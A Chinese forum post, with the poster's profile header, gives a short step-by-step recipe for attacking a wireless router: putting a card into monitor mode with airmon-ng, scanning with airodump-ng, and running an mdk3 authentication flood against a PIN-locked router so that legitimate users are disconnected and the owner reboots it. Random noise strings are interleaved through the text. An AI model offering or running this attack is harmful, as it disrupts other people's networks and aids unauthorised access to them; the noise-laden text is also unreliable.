上等兵
- 注册时间
- 2013-6-6
- 金币
- 48 个
- 威望
- 0 个
- 荣誉
- 0 个
累计签到:2 天 连续签到:0 天 [LV.20]漫游旅程
|
发表于 2013-11-22 11:36
首先检测网卡:
0 ~/ N) k0 [1 h( v/ e) W& N2 [6 Qifconfig -a
+ v4 g" J4 z1 u8 v然后模拟端口:9 | P. j8 k4 m6 e
airmon-ng start wlan09 K3 s" _- p1 H: k( Y7 k' G) Z
接下来用:/ P% h/ {8 E; i
6 B: E) t. f H airodump-ng mon0
4 Q/ b: V3 ~/ Z: b3 B1 C! R5 ~扫描ap找到你pin死的路由器mac
* A# G" j0 c( Z; ~用mdk3 做身份验证攻击
% h0 b2 Q2 ^( t, K7 L! V+ kmdk3 mon0 a -a mac(被pin死的路由器的mac)
# l. A# H7 c5 M( p身份验证攻击效果说明:0 H" x' m# r) U
此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。.5 f7 v; w2 P, c9 g
5 L5 H# @+ [8 |! }6 q
以上是复制的 |
|